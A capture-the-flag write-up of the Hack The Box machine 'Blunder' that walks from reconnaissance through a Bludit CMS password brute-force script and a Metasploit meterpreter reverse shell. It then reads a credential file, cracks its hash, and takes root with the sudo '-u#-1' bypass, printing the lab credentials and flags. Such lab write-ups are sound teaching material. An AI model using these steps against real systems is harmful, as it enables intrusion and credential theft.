Blunder - Hack The Box
Blunder was an easy box for beginners that required bruteforcing the login for a Bludit CMS, then exploiting a known CVE through Metasploit to get remote code execution. The priv esc is a neat little CVE with sudo that allows us to execute commands as root even though the root username is supposed to be blocked.
Portscan
snowscan@kali:~$ sudo nmap -sC -sV -F 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 15:29 EDT
Nmap scan report for blunder.htb (10.10.10.191)
Host is up (0.63s latency).
Not shown: 98 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds
Website CMS
The X-Powered-By header reveals the site is running on Bludit CMS:
snowscan@kali:~/htb/blunder$ curl -v http://blunder.htb
* Trying 10.10.10.191:80...
* TCP_NODELAY set
* Connected to blunder.htb (10.10.10.191) port 80 (#0)
> GET / HTTP/1.1
> Host: blunder.htb
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Date: Sat, 30 May 2020 20:42:40 GMT
< Server: Apache/2.4.41 (Ubuntu)
< X-Powered-By: Bludit
< Vary: Accept-Encoding
< Content-Length: 7562
< Connection: close
< Content-Type: text/html; charset=UTF-8
There’s an exploit on Exploit-DB for Bludit CMS but it requires credentials.
Bruteforcing
After dirbusting we find a todo.txt file that contains a potential username: fergus
wscan@kali:~/htb/blunder$ ffuf -w $WLRC -t 50 -e .txt -u http://blunder.htb/FUZZ -fc 403
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://blunder.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Extensions : .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response status: 403
________________________________________________
0 [Status: 200, Size: 7561, Words: 794, Lines: 171]
LICENSE [Status: 200, Size: 1083, Words: 155, Lines: 22]
about [Status: 200, Size: 3280, Words: 225, Lines: 106]
admin [Status: 301, Size: 0, Words: 1, Lines: 1]
cgi-bin/ [Status: 301, Size: 0, Words: 1, Lines: 1]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2]
todo.txt [Status: 200, Size: 118, Words: 20, Lines: 5]
snowscan@kali:~/htb/blunder$ curl http://blunder.htb/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
To brute force we can use the following script: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
I modified it a little bit to take a wordlist from argv:
[...]
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []
with open(sys.argv[1]) as f:
passwords = f.read().splitlines()
[...]
We can use cewl on the site to generate a wordlist.
snowscan@kali:~/htb/blunder$ cewl http://blunder.htb > cewl.txt
Next, bruteforcing…
snowscan@kali:~/htb/blunder$ chmod +x b.py
snowscan@kali:~/htb/blunder$ ./b.py cewl.txt
[*] Trying: CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
[*] Trying: the
[...]
[*] Trying: character
[*] Trying: RolandDeschain
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
Getting a shell
We can use Metasploit to get a shell with linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > show options
Module options (exploit/linux/http/bludit_upload_images_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
BLUDITPASS RolandDeschain yes The password for Bludit
BLUDITUSER fergus yes The username for Bludit
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.191 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for Bludit
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.29 yes The listen address (an interface may be specified)
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Bludit v3.9.2
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.14.29:80
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading AqdgdpaOLi.png...
[*] Uploading .htaccess...
[*] Executing AqdgdpaOLi.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 2 opened (10.10.14.29:80 -> 10.10.10.191:34040) at 2020-05-30 16:59:15 -0400
[+] Deleted .htaccess
meterpreter > shell
Process 5132 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$
Access to user hugo
There’s another Bludit CMS installation in /var/www/bludit-3.10.0a
www-data@blunder:/var/www$ cat bludit-3.10.0a/bl-content/databases/users.php
cat bludit-3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
The password hash can be cracked online with Crackstation or a similar site: Password120
www-data@blunder:/var/www$ su -l hugo
su -l hugo
Password: Password120
hugo@blunder:~$ cat user.txt
cat user.txt
4b411f0fc0e09a1091c6de87d1f91aaf
Privesc
The sudoers privileges our user has don’t appear to give us anything we can use since it explicitely blocks root.
hugo@blunder:~$ sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
However, because of CVE-2019-14287 in sudo, we can bypass the username check by using #-1 and we get a root shell.
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
5d649f5bcb1be5f93702a7a71cd4d77e